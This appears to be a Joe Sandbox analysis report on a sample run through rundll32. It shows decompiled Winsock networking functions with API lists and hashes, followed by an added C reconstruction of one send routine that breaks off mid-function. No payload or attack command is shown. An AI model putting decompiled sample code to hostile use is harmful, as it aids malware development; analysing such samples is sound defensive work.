                                                            
                                                            				_t65 = __ecx;
                                                            				_t40 =  *0x4684008; // 0xd355be4e, stack cookie (/GS) loaded from the module's data section
                                                            				_v8 = _t40 ^ _t84; // cookie XOR frame pointer, the standard /GS prologue canary
                                                            				_t81 = _a4;
                                                            				_t64 = __edx;
                                                            				_t74 = _a8;
                                                            				_t77 = 0;
                                                            				_v24 = __ecx;
                                                            				_v20 = _t81;
                                                            				_v32 = _t74;
                                                            				_v28 = 0;
                                                            				while( *((intOrPtr*)(_t64 + 0x4c)) == 0) {
                                                            					_t51 =  *_t74;
                                                            					if(_t51 == 0 || _t51 == 1) {
                                                            						_t82 = _t81 + 0x1c;
                                                            						_t53 =  *((intOrPtr*)( *_t65 + 0xcc))();
                                                            						_t77 = 0;
                                                            						 *_t82 = _t53;
                                                            						_v16 = 0;
                                                            						_v12 = 0;
                                                            						_t56 = _v20;
                                                            						__imp__WSARecv( *((intOrPtr*)(_t56 + 0x34)), _t82, 1,  &_v12,  &_v16, 0, 0);
                                                            						if(_t56 != 0xffffffff) {
                                                            							_t57 = _v12;
                                                            							if(_t57 == 0) {
                                                            								_t77 = 0x2775;
                                                            								goto L9;
                                                            							} else {
                                                            								 *_t82 = _t57;
                                                            								goto L10;
                                                            							}
                                                            						} else {
                                                            							__imp__#111();
                                                            							_t77 = _t56;
                                                            							L9:
                                                            							if(_t77 != 0) {
                                                            								_t65 = _v24;
                                                            								_t81 = _v20;
                                                            								_t74 = _v32;
                                                            							} else {
                                                            								L10:
                                                            								_t58 = 0xff;
                                                            								_v12 = 0xff;
                                                            								if( *((intOrPtr*)(_t64 + 0x30)) != 0) {
                                                            									_t83 = _t64 + 0x54;
                                                            									EnterCriticalSection(_t83);
                                                            									if( *((intOrPtr*)(_t64 + 0x30)) != 0) {
                                                            										SetLastError(0);
                                                            										_t75 = _v20;
                                                            										_v12 =  *((intOrPtr*)( *_v24 + 0xe8))(_t64,  *((intOrPtr*)(_t75 + 0x20)),  *((intOrPtr*)(_t75 + 0x1c)));
                                                            									}
                                                            									LeaveCriticalSection(_t83);
                                                            									_t58 = _v12;
                                                            								}
                                                            								_t74 = _v32;
                                                            								_t65 = _v24;
                                                            								_t81 = _v20;
                                                            								 *_t74 = _t58;
                                                            								_t60 = _v28 + 1;
                                                            								_v28 = _t60;
                                                            								if(_t60 < 0x1e) {
                                                            									continue;
                                                            								} else {
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					break;
                                                            				}
                                                            				_t42 =  *_t74;
                                                            				if(_t42 == 0 || _t42 == 1) {
                                                            					if(_t77 == 0 || _t77 == 0x2733) {
                                                            						return E04655AFE(_v8 ^ _t84);
                                                            					} else {
                                                            						if(_t77 != 0x2775) {
                                                            							if(_t77 != 0x2736 && _t77 != 0x3e3) {
                                                            								_push(_t77);
                                                            								_push(4);
                                                            								_push(2);
                                                            								goto L26;
                                                            							}
                                                            						} else {
                                                            							_push(0);
                                                            							_push(0);
                                                            							_push(1);
                                                            							L26:
                                                            							_push(_t64);
                                                            							E04652920(_t65);
                                                            						}
                                                            						_t45 = E0464C930(_v24 + 0xb0, _t81);
                                                            						if(_t45 == 0) {
                                                            							HeapFree( *( *(_t81 + 0x14)), _t45, _t81);
                                                            						}
                                                            						goto L29;
                                                            					}
                                                            				} else {
                                                            					L29:
                                                            					return E04655AFE(_v8 ^ _t84);
                                                            				}
                                                            			}

                                                            0x046556c0
                                                            0x046556c6
                                                            0x046556cd
                                                            0x046556d2
                                                            0x046556d5
                                                            0x046556d7
                                                            0x046556db
                                                            0x046556dd
                                                            0x046556e0
                                                            0x046556e3
                                                            0x046556e6
                                                            0x046556f0
                                                            0x046556fa
                                                            0x046556fe
                                                            0x0465570b
                                                            0x0465570e
                                                            0x04655714
                                                            0x04655716
                                                            0x0465571d
                                                            0x04655724
                                                            0x04655728
                                                            0x04655731
                                                            0x0465573a
                                                            0x04655746
                                                            0x0465574b
                                                            0x04655751
                                                            0x00000000
                                                            0x0465574d
                                                            0x0465574d
                                                            0x00000000
                                                            0x0465574d
                                                            0x0465573c
                                                            0x0465573c
                                                            0x04655742
                                                            0x04655756
                                                            0x04655758
                                                            0x046557bf
                                                            0x046557c2
                                                            0x046557c5
                                                            0x0465575a
                                                            0x0465575a
                                                            0x0465575e
                                                            0x04655763
                                                            0x04655766
                                                            0x04655768
                                                            0x0465576c
                                                            0x04655776
                                                            0x0465577a
                                                            0x04655780
                                                            0x04655795
                                                            0x04655795
                                                            0x04655799
                                                            0x0465579f
                                                            0x0465579f
                                                            0x046557a2
                                                            0x046557a5
                                                            0x046557a8
                                                            0x046557ab
                                                            0x046557b0
                                                            0x046557b1
                                                            0x046557b7
                                                            0x00000000
                                                            0x00000000
                                                            0x046557bd
                                                            0x046557b7
                                                            0x04655758
                                                            0x0465573a
                                                            0x00000000
                                                            0x046556fe
                                                            0x046557c8
                                                            0x046557cc
                                                            0x046557d5
                                                            0x04655852
                                                            0x046557df
                                                            0x046557e5
                                                            0x046557f5
                                                            0x046557ff
                                                            0x04655800
                                                            0x04655802
                                                            0x00000000
                                                            0x04655802
                                                            0x046557e7
                                                            0x046557e7
                                                            0x046557e9
                                                            0x046557eb
                                                            0x04655804
                                                            0x04655804
                                                            0x04655805
                                                            0x04655805
                                                            0x04655814
                                                            0x0465581b
                                                            0x04655824
                                                            0x04655824
                                                            0x00000000
                                                            0x0465581b
                                                            0x0465582a
                                                            0x0465582a
                                                            0x0465583c
                                                            0x0465583c

                                                            APIs
                                                            • WSARecv.WS2_32(?,-0000001B,00000001,00000001,?,00000000,00000000), ref: 04655731
                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,00000001,00000000,?,?,?,046529B2), ref: 0465573C
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0465576C
                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,?,00000001,00000000,?,?,?,046529B2), ref: 0465577A
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04655799
                                                            • HeapFree.KERNEL32(?,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00000001,00000000,?,?), ref: 04655824
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterFreeHeapLeaveRecv
                                                            • String ID:
                                                            • API String ID: 4219686125-0
                                                            • Opcode ID: c5e2f2dbab265634a3c8f2e691465454d35e179bb3ac69f11de40b16515a71fa
                                                            • Instruction ID: 11ad8f6c68463f4be4a2589bb2375cbad9b378e83c76daac4d52a4eeabed8cd2
                                                            • Opcode Fuzzy Hash: c5e2f2dbab265634a3c8f2e691465454d35e179bb3ac69f11de40b16515a71fa
                                                            • Instruction Fuzzy Hash: DF516E75A00215EBDB10CF99C888BAEBBB9FF48310F144469EC0AE7364F734A940CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 16%
                                                            			E0464F190(void* __ebx, void* __edi, intOrPtr* _a4) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				intOrPtr _v16;
                                                            				intOrPtr _v20;
                                                            				char _v24;
                                                            				long _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				signed int _v56;
                                                            				signed int _v68;
                                                            				char _v112;
                                                            				intOrPtr _v132;
                                                            				signed int _t98;
                                                            				intOrPtr _t121;
                                                            				char* _t125;
                                                            				intOrPtr _t130;
                                                            				intOrPtr _t133;
                                                            				intOrPtr _t135;
                                                            				long _t137;
                                                            				signed char _t138;
                                                            				intOrPtr _t140;
                                                            				long _t141;
                                                            				intOrPtr _t154;
                                                            				intOrPtr _t157;
                                                            				intOrPtr* _t159;
                                                            				intOrPtr* _t161;
                                                            				intOrPtr* _t184;
                                                            				long _t185;
                                                            				signed char _t190;
                                                            				void* _t191;
                                                            				intOrPtr* _t192;
                                                            				intOrPtr* _t194;
                                                            				intOrPtr* _t197;
                                                            				signed int _t201;
                                                            				signed int _t202;
                                                            				signed int _t204;
                                                            
                                                            				_t98 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t98 ^ _t201;
                                                            				_t192 = _a4;
                                                            				GetCurrentThreadId();
                                                            				_t159 = _t192;
                                                            				 *((intOrPtr*)( *_t192 + 0xc0))(GetCurrentThreadId(), __edi, _t191, __ebx);
                                                            				_t154 =  *((intOrPtr*)(_t192 + 0x2c));
                                                            				_v24 =  *((intOrPtr*)(_t192 + 0x20));
                                                            				_v20 =  *((intOrPtr*)(_t192 + 0x174));
                                                            				_v16 =  *((intOrPtr*)(_t192 + 0x178));
                                                            				_v12 =  *((intOrPtr*)(_t192 + 0x17c));
                                                            				_t107 =  *(_t192 + 0x5c);
                                                            				_v28 = 1;
                                                            				if( *(_t192 + 0x5c) != 0) {
                                                            					L0465ED17(_t107);
                                                            					_t204 = _t204 + 4;
                                                            					 *(_t192 + 0x5c) = 0;
                                                            					 *(_t192 + 0x60) = 0;
                                                            					 *(_t192 + 0x64) = 0;
                                                            				}
                                                            				E0463ADA0(_t192 + 0x5c, _t154, _t159, 0);
                                                            				_t161 = _t192;
                                                            				if( *((intOrPtr*)( *_t192 + 0x24))() == 0) {
                                                            					L18:
                                                            					 *((intOrPtr*)( *_t192 + 0xc4))(GetCurrentThreadId());
                                                            					if(_v28 != 0 &&  *((intOrPtr*)( *_t192 + 0x24))() != 0) {
                                                            						 *((intOrPtr*)( *_t192 + 4))();
                                                            					}
                                                            					GetCurrentThreadId();
                                                            					return E04655AFE(_v8 ^ _t201);
                                                            				} else {
                                                            					_t184 = __imp__WSAWaitForMultipleEvents;
                                                            					do {
                                                            						_t121 =  *_t184(4,  &_v24, 0, 0xffffffff, 0);
                                                            						if(_t121 != 0) {
                                                            							if(_t121 != 1) {
                                                            								if(_t121 == 2) {
                                                            									_v28 = 0;
                                                            									goto L18;
                                                            								} else {
                                                            									if(_t121 != 3) {
                                                            										if(_t121 != 0xffffffff) {
                                                            											E04637AC0();
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											_t202 = _t204;
                                                            											_v68 =  *0x4684008 ^ _t202;
                                                            											_t194 = _t161;
                                                            											_t125 =  &_v112;
                                                            											_t185 = 1;
                                                            											__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t194 + 0x1c)),  *((intOrPtr*)(_t194 + 0x20)), _t125, _t184, _t192, _t201, 0x80004005);
                                                            											if(_t125 != 0xffffffff) {
                                                            												L33:
                                                            												if( *((intOrPtr*)( *_t194 + 0x40))() != 0) {
                                                            													L37:
                                                            													if(_t185 == 0) {
                                                            														goto L52;
                                                            													} else {
                                                            														if((_v56 & 0x00000001) != 0) {
                                                            															_t135 = _v52;
                                                            															if(_t135 != 0) {
                                                            																 *(_t194 + 0xc) = 1;
                                                            																_t185 = 0;
                                                            																 *(_t194 + 0x10) = 4;
                                                            																 *((intOrPtr*)(_t194 + 0x14)) = _t135;
                                                            																 *(_t194 + 0x18) = 1;
                                                            															} else {
                                                            																_t185 = E0464F540(_t194);
                                                            															}
                                                            														}
                                                            														if(_t185 == 0) {
                                                            															goto L52;
                                                            														} else {
                                                            															if((_v56 & 0x00000002) != 0) {
                                                            																_t133 = _v48;
                                                            																if(_t133 != 0) {
                                                            																	 *(_t194 + 0xc) = 1;
                                                            																	_t185 = 0;
                                                            																	 *(_t194 + 0x10) = 3;
                                                            																	 *((intOrPtr*)(_t194 + 0x14)) = _t133;
                                                            																	 *(_t194 + 0x18) = 1;
                                                            																} else {
                                                            																	_t185 = E0464F610(_t194);
                                                            																}
                                                            															}
                                                            															if(_t185 == 0 || (_v56 & 0x00000020) == 0) {
                                                            																goto L52;
                                                            															} else {
                                                            																_t130 = _v32;
                                                            																 *(_t194 + 0xc) = 1;
                                                            																 *(_t194 + 0x10) = 5;
                                                            																 *(_t194 + 0x18) = 1;
                                                            																if(_t130 != 0) {
                                                            																	 *((intOrPtr*)(_t194 + 0x14)) = _t130;
                                                            																	_t185 = 0;
                                                            																	goto L52;
                                                            																} else {
                                                            																	 *((intOrPtr*)(_t194 + 0x14)) = _t130;
                                                            																	return E04655AFE(_v12 ^ _t202);
                                                            																}
                                                            															}
                                                            														}
                                                            													}
                                                            												} else {
                                                            													if(_t185 == 0) {
                                                            														L52:
                                                            														return E04655AFE(_v12 ^ _t202);
                                                            													} else {
                                                            														if((_v56 & 0x00000010) != 0) {
                                                            															_t137 =  &_v56;
                                                            															_push(_t137);
                                                            															L54();
                                                            															_t185 = _t137;
                                                            														}
                                                            														goto L37;
                                                            													}
                                                            												}
                                                            											} else {
                                                            												__imp__#111(_t154);
                                                            												_t157 = _t125;
                                                            												_t138 = _v56;
                                                            												if((_t138 & 0x00000010) == 0) {
                                                            													if((_t138 & 0x00000020) == 0) {
                                                            														if((_t138 & 0x00000001) == 0) {
                                                            															_t138 = 3;
                                                            															_t190 =  !=  ? 3 : 0;
                                                            														} else {
                                                            															_t190 = 4;
                                                            														}
                                                            													} else {
                                                            														_t190 = 5;
                                                            													}
                                                            												} else {
                                                            													_t190 = 2;
                                                            												}
                                                            												__imp__WSAResetEvent( *((intOrPtr*)(_t194 + 0x20)));
                                                            												if(_t138 == 0) {
                                                            													_push(0x80004005);
                                                            													E04637AC0();
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													_push(_t202);
                                                            													_t140 = _v132;
                                                            													_push(_t194);
                                                            													_t197 = _t161;
                                                            													_t84 = _t140 + 0x14; // 0x8b0b75c0
                                                            													_t141 =  *_t84;
                                                            													if(_t141 != 0) {
                                                            														L57:
                                                            														 *(_t197 + 0xc) = 1;
                                                            														 *(_t197 + 0x10) = 2;
                                                            														 *(_t197 + 0x14) = _t141;
                                                            														 *(_t197 + 0x18) = 1;
                                                            														return 0;
                                                            													} else {
                                                            														__imp__WSAEventSelect( *((intOrPtr*)(_t197 + 0x1c)),  *((intOrPtr*)(_t197 + 0x20)), 0x23);
                                                            														if(_t141 != 0xffffffff) {
                                                            															 *(_t197 + 0x4c) = 1;
                                                            															 *(_t197 + 0x50) = 1;
                                                            															SetLastError(0);
                                                            															if( *((intOrPtr*)( *_t197 + 0x7c))() != 2) {
                                                            																return 1;
                                                            															} else {
                                                            																 *(_t197 + 0xc) = 0;
                                                            																 *(_t197 + 0x10) = 5;
                                                            																 *(_t197 + 0x14) = 0;
                                                            																 *(_t197 + 0x18) = 1;
                                                            																return 0;
                                                            															}
                                                            														} else {
                                                            															__imp__#111();
                                                            															goto L57;
                                                            														}
                                                            													}
                                                            												} else {
                                                            													 *(_t194 + 0x10) = _t190;
                                                            													_t185 = 0;
                                                            													 *((intOrPtr*)(_t194 + 0x14)) = _t157;
                                                            													 *(_t194 + 0xc) = 1;
                                                            													 *(_t194 + 0x18) = 1;
                                                            													goto L33;
                                                            												}
                                                            											}
                                                            										} else {
                                                            											__imp__#111();
                                                            											 *(_t192 + 0xc) = 1;
                                                            											 *(_t192 + 0x10) = 0;
                                                            											 *((intOrPtr*)(_t192 + 0x14)) = _t121;
                                                            											 *(_t192 + 0x18) = 1;
                                                            											goto L18;
                                                            										}
                                                            									} else {
                                                            										if( *((intOrPtr*)( *_t192 + 0xbc))() == 0) {
                                                            											goto L18;
                                                            										} else {
                                                            											_t121 = E0464F540(_t192);
                                                            											goto L12;
                                                            										}
                                                            									}
                                                            								}
                                                            							} else {
                                                            								_t121 = E0464F610(_t192);
                                                            								goto L12;
                                                            							}
                                                            						} else {
                                                            							L23();
                                                            							L12:
                                                            							if(_t121 == 0) {
                                                            								goto L18;
                                                            							} else {
                                                            								goto L13;
                                                            							}
                                                            						}
                                                            						goto L61;
                                                            						L13:
                                                            						_t161 = _t192;
                                                            					} while ( *((intOrPtr*)( *_t192 + 0x24))() != 0);
                                                            					goto L18;
                                                            				}
                                                            				L61:
                                                            			}


                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464F1AC
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464F1B0
                                                            • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000,?,00000000), ref: 0464F23C
                                                            • WSAGetLastError.WS2_32(?,00000000), ref: 0464F28E
                                                              • Part of subcall function 0464F610: RtlEnterCriticalSection.NTDLL(?), ref: 0464F644
                                                              • Part of subcall function 0464F610: RtlLeaveCriticalSection.NTDLL(?), ref: 0464F69B
                                                              • Part of subcall function 0464F610: HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0464F6DF
                                                              • Part of subcall function 0464F610: RtlEnterCriticalSection.NTDLL(?), ref: 0464F6F1
                                                              • Part of subcall function 0464F610: RtlLeaveCriticalSection.NTDLL(?), ref: 0464F730
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464F2BD
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464F2E0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalCurrentSectionThread$EnterLeave$ErrorEventsFreeHeapLastMultipleWait
                                                            • String ID:
                                                            • API String ID: 2095029031-0
                                                            • Opcode ID: db0cb1793fce3ad47f482131cab45e7e29f2ded5c89cb31c53646e3239b70809
                                                            • Instruction ID: 008c8bb243a9e506152eb66fa772d76e863bc7633367c2425a67813317e62a7e
                                                            • Opcode Fuzzy Hash: db0cb1793fce3ad47f482131cab45e7e29f2ded5c89cb31c53646e3239b70809
                                                            • Instruction Fuzzy Hash: DE4149746006059FEB28DFA8C888B6EB7E4BF98314F200A1DD946D7780EB74F9018B95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E046547C0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				intOrPtr _v20;
                                                            				signed int _t26;
                                                            				char* _t29;
                                                            				intOrPtr _t30;
                                                            				void* _t43;
                                                            				intOrPtr _t58;
                                                            				void* _t59;
                                                            				struct _CRITICAL_SECTION* _t61;
                                                            				signed int _t63;
                                                            
                                                            				_t59 = __esi;
                                                            				_t43 = __ebx;
                                                            				_t26 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t26 ^ _t63;
                                                            				_t58 = _a4;
                                                            				_t29 =  &_v12;
                                                            				_v20 = __ecx;
                                                            				_v16 = 4;
                                                            				__imp__#7( *((intOrPtr*)(_t58 + 0x88)), 0xffff, 0x1001, _t29,  &_v16); // ws2_32 ordinal 7 = getsockopt(sock, SOL_SOCKET (0xffff), SO_SNDBUF (0x1001), &size, &len)
                                                            				if(_t29 == 0xffffffff) {
                                                            					L2:
                                                            					_t30 = 0x4000; // getsockopt returned SOCKET_ERROR or a non-positive size: fall back to 0x4000 (16 KiB)
                                                            					_v12 = 0x4000;
                                                            				} else {
                                                            					_t30 = _v12;
                                                            					if(_t30 <= 0) {
                                                            						goto L2;
                                                            					}
                                                            				}
                                                            				if( *((intOrPtr*)(_t58 + 0x44)) <= _t30) {
                                                            					_push(_t43);
                                                            					_t44 = 0;
                                                            					_push(_t59);
                                                            					if( *((intOrPtr*)(_t58 + 0x40)) <= 0 || InterlockedCompareExchange(_t58 + 0x3c, 0, 1) != 1) { // (dest, exchange=0, comparand=1): claims the slot at +0x3c only if it currently reads 1
                                                            						L18:
                                                            						return E04655AFE(_v8 ^ _t63);
                                                            					} else {
                                                            						_t61 = _t58 + 0x6c;
                                                            						EnterCriticalSection(_t61);
                                                            						if( *((intOrPtr*)(_t58 + 0x30)) != 0) {
                                                            							if( *((intOrPtr*)(_t58 + 0x40)) > 0) {
                                                            								_t44 = E04654A50(0, _v20, _t58, _t61, _t58);
                                                            							}
                                                            							 *(_t58 + 0x3c) = 1;
                                                            							LeaveCriticalSection(_t61);
                                                            							if(_t44 != 0x3e5) { // 0x3e5 = ERROR_IO_PENDING (997)
                                                            								if(_t44 != 0 && _t44 != 0x2736 && _t44 != 0x3e3) { // 0x2736 = WSAENOTSOCK (10038), 0x3e3 = ERROR_OPERATION_ABORTED (995) are ignored; any other non-zero error is reported
                                                            									E04652920(_v20, _t58, 2, 3, _t44);
                                                            								}
                                                            							} else {
                                                            								if( *(_t58 + 0x3c) != 0) {
                                                            									PostQueuedCompletionStatus( *(_v20 + 0x50), 0xfffffff3,  *(_t58 + 4), 0); // (iocp, dwNumberOfBytesTransferred=0xfffffff3, dwCompletionKey=*(_t58+4), lpOverlapped=NULL)
                                                            								}
                                                            							}
                                                            							goto L18;
                                                            						} else {
                                                            							LeaveCriticalSection(_t61); // +0x30 is zero: leaves the section without restoring the slot at +0x3c to 1
                                                            							return E04655AFE(_v8 ^ _t63);
                                                            						}
                                                            					}
                                                            				} else {
                                                            					return E04655AFE(_v8 ^ _t63);
                                                            				}
                                                            			}

                                                            0x046547c0
                                                            0x046547c0
                                                            0x046547c6
                                                            0x046547cd
                                                            0x046547d1
                                                            0x046547d8
                                                            0x046547db
                                                            0x046547ef
                                                            0x046547f6
                                                            0x046547ff
                                                            0x04654808
                                                            0x04654808
                                                            0x0465480d
                                                            0x04654801
                                                            0x04654801
                                                            0x04654806
                                                            0x00000000
                                                            0x00000000
                                                            0x04654806
                                                            0x04654813
                                                            0x04654828
                                                            0x04654829
                                                            0x0465482b
                                                            0x0465482f
                                                            0x046548dc
                                                            0x046548ee
                                                            0x0465484b
                                                            0x0465484b
                                                            0x0465484f
                                                            0x04654858
                                                            0x0465487c
                                                            0x04654887
                                                            0x04654887
                                                            0x0465488a
                                                            0x04654891
                                                            0x0465489d
                                                            0x046548bc
                                                            0x046548d7
                                                            0x046548d7
                                                            0x0465489f
                                                            0x046548a3
                                                            0x046548b2
                                                            0x046548b2
                                                            0x046548a3
                                                            0x00000000
                                                            0x0465485a
                                                            0x0465485b
                                                            0x04654876
                                                            0x04654876
                                                            0x04654858
                                                            0x04654815
                                                            0x04654825
                                                            0x04654825

                                                            APIs
                                                            • getsockopt.WS2_32(?,0000FFFF,00001001,?,00000000), ref: 046547F6
                                                            • InterlockedCompareExchange.KERNEL32(00000000,00000000,00000001), ref: 0465483C
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0465484F
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0465485B
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04654891
                                                            • PostQueuedCompletionStatus.KERNEL32(?,000000F3,00000001,00000000), ref: 046548B2
                                                              • Part of subcall function 04654A50: InterlockedExchangeAdd.KERNEL32(?,00004E20), ref: 04654ADB
                                                              • Part of subcall function 04654A50: WSASend.WS2_32(?,00004E20,00000001,?,00000000,?,00000000), ref: 04654B0E
                                                              • Part of subcall function 04654A50: WSAGetLastError.WS2_32 ref: 04654B19
                                                              • Part of subcall function 04654A50: InterlockedDecrement.KERNEL32(00000002), ref: 04654B29
                                                              • Part of subcall function 04654A50: HeapFree.KERNEL32(?,00000000,?,?), ref: 04654B59
                                                              • Part of subcall function 04652920: RtlEnterCriticalSection.NTDLL(00000054), ref: 04652959
                                                              • Part of subcall function 04652920: RtlEnterCriticalSection.NTDLL(-0000006C), ref: 0465295F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterInterlocked$ExchangeLeave$CompareCompletionDecrementErrorFreeHeapLastPostQueuedSendStatusgetsockopt
                                                            • String ID:
                                                            • API String ID: 2014370420-0
                                                            • Opcode ID: e0f15c8184989f02428c03e1b6d437e3f1bc204ca87597c306116aa9be9736a5
                                                            • Instruction ID: 13f41e302f9797ae6578703885ee4ab248ae6b9408cffe4209ca5743ff3d2b15
                                                            • Opcode Fuzzy Hash: e0f15c8184989f02428c03e1b6d437e3f1bc204ca87597c306116aa9be9736a5
                                                            • Instruction Fuzzy Hash: 8C31A371601149BFEB14DF94D888BBEB378FF14314F00416AED15966A0EF75B9A08B80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
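The control flow of E046547C0 above, rewritten as an added C example (this is an editor's reconstruction for readability, not code from the sample or from Joe Sandbox): the Winsock and Win32 constants are named, the platform calls (getsockopt, the WSASend wrapper E04654A50, PostQueuedCompletionStatus, the error callback E04652920) are replaced by injectable stand-ins so the logic runs off-Windows, and the field meanings (pending bytes at +0x44, queue length at +0x40, idle flag at +0x3c, open flag at +0x30) are inferences from how the decompilation uses each offset, not confirmed facts. The scenario inputs are constructed.

```c
#include <stdint.h>

/* Constants as they appear in the decompilation of E046547C0 */
#define SOL_SOCKET_W            0xFFFF
#define SO_SNDBUF_W             0x1001
#define DEFAULT_SNDBUF          0x4000      /* 16 KiB fallback */
#define ERROR_OPERATION_ABORTED 0x3E3       /* 995 */
#define ERROR_IO_PENDING        0x3E5       /* 997 */
#define WSAENOTSOCK             0x2736      /* 10038 */
#define WSAECONNRESET           0x2746      /* 10054, used only by the constructed scenarios */
#define POSTED_BYTES_MARKER     0xFFFFFFF3u /* dwNumberOfBytesTransferred in the PostQueuedCompletionStatus call */

typedef struct conn conn_t;
struct conn {
    /* Field meanings are inferred from how the sample uses each offset (assumptions) */
    uint32_t pending_bytes;   /* +0x44 */
    int      queued;          /* +0x40 */
    long     idle;            /* +0x3c: 1 = no send in flight */
    int      open;            /* +0x30 */
    /* Stand-ins for getsockopt and the WSASend wrapper (E04654A50); constructed for this example */
    int (*getsockopt_fn)(conn_t *c, int level, int optname, int *size); /* -1 = SOCKET_ERROR */
    int (*send_fn)(conn_t *c);                                          /* 0 or an error code */
    /* Recorded side effects, standing in for PostQueuedCompletionStatus and E04652920 */
    int      posted_completions;
    uint32_t last_posted_bytes;
    int      reported_error;
};

enum send_outcome { SEND_THROTTLED, SEND_NOT_IDLE, SEND_CLOSED, SEND_DONE,
                    SEND_PENDING, SEND_IGNORED_ERROR, SEND_FAILED };

/* getsockopt(SOL_SOCKET, SO_SNDBUF) with the sample's fallback to 0x4000 on failure or a non-positive size */
int effective_sndbuf(conn_t *c)
{
    int size = 0;
    if (c->getsockopt_fn(c, SOL_SOCKET_W, SO_SNDBUF_W, &size) == -1 || size <= 0)
        return DEFAULT_SNDBUF;
    return size;
}

/* Single-threaded stand-in for InterlockedCompareExchange(dest, exchange, comparand):
 * stores exchange only if *dest == comparand and returns the previous value */
static long cmpxchg(long *dest, long exchange, long comparand)
{
    long prev = *dest;
    if (prev == comparand) *dest = exchange;
    return prev;
}

enum send_outcome try_send(conn_t *c)
{
    if (c->pending_bytes > (uint32_t)effective_sndbuf(c))
        return SEND_THROTTLED;                 /* more is pending than the kernel buffer holds */
    if (c->queued <= 0 || cmpxchg(&c->idle, 0, 1) != 1)
        return SEND_NOT_IDLE;                  /* nothing queued, or a send is already in flight */
    /* EnterCriticalSection(+0x6c) in the sample */
    if (!c->open)
        return SEND_CLOSED;                    /* sample leaves the section without setting idle back to 1 */
    int err = (c->queued > 0) ? c->send_fn(c) : 0;
    c->idle = 1;                               /* release the slot before LeaveCriticalSection */
    if (err == ERROR_IO_PENDING) {
        if (c->idle) {                         /* sample re-reads +0x3c here */
            c->posted_completions++;           /* PostQueuedCompletionStatus(iocp, 0xFFFFFFF3, key, NULL) */
            c->last_posted_bytes = POSTED_BYTES_MARKER;
        }
        return SEND_PENDING;
    }
    if (err == 0)
        return SEND_DONE;
    if (err == WSAENOTSOCK || err == ERROR_OPERATION_ABORTED)
        return SEND_IGNORED_ERROR;             /* socket already torn down: silently dropped */
    c->reported_error = err;                   /* E04652920(ctx, conn, 2, 3, err) */
    return SEND_FAILED;
}

/* Constructed stand-ins and a builder so scenarios can be exercised without Winsock */
int sndbuf_8k(conn_t *c, int level, int optname, int *size)
{ (void)c; if (level != SOL_SOCKET_W || optname != SO_SNDBUF_W) return -1; *size = 0x2000; return 0; }
int sndbuf_fail(conn_t *c, int level, int optname, int *size)
{ (void)c; (void)level; (void)optname; (void)size; return -1; }
int send_ok(conn_t *c)       { (void)c; return 0; }
int send_pending(conn_t *c)  { (void)c; return ERROR_IO_PENDING; }
int send_reset(conn_t *c)    { (void)c; return WSAECONNRESET; }
int send_notsock(conn_t *c)  { (void)c; return WSAENOTSOCK; }

conn_t make_conn(int (*gso)(conn_t *, int, int, int *), int (*snd)(conn_t *),
                 uint32_t pending, int queued, long idle, int open)
{
    conn_t c = {0};
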